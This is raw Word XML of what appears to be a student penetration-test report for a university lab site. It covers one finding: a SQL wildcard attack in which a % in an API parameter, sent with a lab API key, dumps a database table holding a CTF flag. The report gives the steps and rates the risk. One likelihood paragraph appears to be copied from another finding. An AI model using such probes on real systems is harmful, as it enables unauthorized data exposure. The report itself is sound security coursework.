    <w:p w14:paraId="7AB27931" w14:textId="71026BB1" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45"/>
    <w:p w14:paraId="04EA5300" w14:textId="2C7EE305" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="1AD7FD40" w14:textId="6B1B5032" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="2014F06D" w14:textId="5E5840DD" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="7ABD521F" w14:textId="4C04686C" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="62354BBA" w14:textId="31A70F43" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="71015E5F" w14:textId="3B2C043D" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="22AB6AE2" w14:textId="77777777" w:rsidR="004E04E4" w:rsidRDefault="004E04E4"/>
    <w:p w14:paraId="2BE05313" w14:textId="5F0A9DED" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="00FD2C45">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc71488346"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finding 4 - SQL Wildcard Attack</w:t>
      </w:r>
      <w:r w:rsidR="00FC2B1D">
        <w:t xml:space="preserve"> in API Documentation Page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="3ED140CE" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="00FD2C45"/>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FD2C45" w14:paraId="3499265A" w14:textId="77777777" w:rsidTr="0093170A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CAFE50A" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="28" w:name="_Toc71488347"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="28"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02F2B868" w14:textId="52AE923E" w:rsidR="00FD2C45" w:rsidRDefault="00430071" w:rsidP="007A5547">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL wildcard can lead to leakage of sensitive information. </w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:t xml:space="preserve">In this vulnerability, special characters, such as % or _, can help us explore data saved in database. </w:t>
            </w:r>
            <w:r>
              <w:t>In API</w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">documentation page, there are instructions for how to access API information. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>And we can change the value of name parameter to</w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">%, to access all information in this API table </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD2C45" w14:paraId="644437F9" w14:textId="77777777" w:rsidTr="0093170A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="726129DB" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="29" w:name="_Toc71488348"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="29"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78067C1C" w14:textId="5F835572" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Step1: </w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:t>pen burp suite</w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t xml:space="preserve"> and login the website</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t xml:space="preserve">then </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">visit URL </w:t>
            </w:r>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/api/store.php?name=OSCP</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6935C0" w14:textId="3BE381AC" w:rsidR="001226A4" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:bookmarkStart w:id="30" w:name="f4_s2"/>
            <w:r>
              <w:t>Step2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="30"/>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="001226A4">
              <w:t>In burp suite, send this request to repeater, in the header part, add one line</w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t xml:space="preserve"> (the complete screenshot of this request </w:t>
            </w:r>
            <w:r w:rsidR="0023613F">
              <w:t xml:space="preserve">and response </w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t xml:space="preserve">can be found in </w:t>
            </w:r>
            <w:hyperlink w:anchor="A2_s4" w:history="1">
              <w:r w:rsidR="0088572A" w:rsidRPr="0023613F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Append</w:t>
              </w:r>
              <w:r w:rsidR="0023613F" w:rsidRPr="0023613F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>i</w:t>
              </w:r>
              <w:r w:rsidR="0088572A" w:rsidRPr="0023613F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>x</w:t>
              </w:r>
              <w:r w:rsidR="0023613F" w:rsidRPr="0023613F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidR="0088572A" w:rsidRPr="0023613F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>2 Section 4</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="0088572A">
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="001226A4">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4309ED84" w14:textId="77777777" w:rsidR="001226A4" w:rsidRDefault="001226A4" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>apikey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>: ace0ee64-af2a-11eb-9a2c-0242ac110002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F85EA4" w14:textId="2CE677A6" w:rsidR="00FD2C45" w:rsidRDefault="001226A4" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Send the request, and we can get information about OSCP in the response. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3027CF93" w14:textId="60F6F829" w:rsidR="001226A4" w:rsidRDefault="001226A4" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9B341A" wp14:editId="462AC946">
                  <wp:extent cx="3940175" cy="478155"/>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0175" cy="478155"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="64F6EF01" w14:textId="44D85FE4" w:rsidR="001226A4" w:rsidRDefault="001226A4" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="31" w:name="f4_s3"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>tep3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="31"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">: Change the request, replace OSCP with %. And send out the request. Now we receive a response containing information of all APIs saved in this database, and </w:t>
            </w:r>
            <w:r w:rsidR="00346406">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>the FLAG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> is there.</w:t>
            </w:r>
            <w:r w:rsidR="0023613F">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>See t</w:t>
            </w:r>
            <w:r w:rsidR="0023613F">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>he request and complete response</w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> at </w:t>
            </w:r>
            <w:r w:rsidR="0023613F">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink w:anchor="A2_s4" w:history="1">
              <w:r w:rsidR="005B022B" w:rsidRPr="0023613F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix 2 Section 4</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="005B022B">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0023613F">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36ADCE84" w14:textId="77777777" w:rsidR="005B022B" w:rsidRDefault="005B022B" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="148F9B44" w14:textId="03D2E3E1" w:rsidR="001226A4" w:rsidRPr="002917EE" w:rsidRDefault="001226A4" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FBC102E" wp14:editId="7E43FDB3">
                  <wp:extent cx="3940175" cy="230588"/>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0549" cy="236462"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD2C45" w14:paraId="3D7C387A" w14:textId="77777777" w:rsidTr="0093170A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2824351C" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="32" w:name="_Toc71488349"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="32"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10162AFF" w14:textId="0770A906" w:rsidR="00FD2C45" w:rsidRDefault="00430071" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Moderate: </w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:t>This vulnerability can only lead to leakage of the API table. In this table, except the flag, there are no other sensitive information. Thus, I think it should be moderate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD2C45" w14:paraId="6427719F" w14:textId="77777777" w:rsidTr="0093170A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="618F70DE" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="33" w:name="_Toc71488350"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="33"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56E9D89A" w14:textId="4F4D0A0D" w:rsidR="00FD2C45" w:rsidRDefault="00430071" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Possible: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">I </w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>think</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> th</w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>e SQL wildcard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> as possible, because only authenticated users can use the Anonymous Question functionality. If an attacker wants to exploit this vulnerability, firstly, he needs a valid login credentials to authenticate into the web application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD2C45" w14:paraId="4B57333F" w14:textId="77777777" w:rsidTr="002917EE">
        <w:trPr>
          <w:trHeight w:val="744"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="583ECD42" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="_Toc71488351"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C3BC090" w14:textId="3431784E" w:rsidR="00FD2C45" w:rsidRDefault="00430071" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Medium: </w:t>
            </w:r>
            <w:r>
              <w:t>This vulnerability’s impact is moderate, and likelihood is possible, according to ISO31000 Risk Matrix (</w:t>
            </w:r>
            <w:hyperlink w:anchor="A1" w:history="1">
              <w:r w:rsidRPr="00D705B9">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix 1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">), the risk rating </w:t>
            </w:r>
            <w:r w:rsidR="007A5547">
              <w:t>should be</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00381A8D">
              <w:t>medium</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD2C45" w14:paraId="17A05231" w14:textId="77777777" w:rsidTr="0093170A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B55D71E" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="35" w:name="_Toc71488352"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
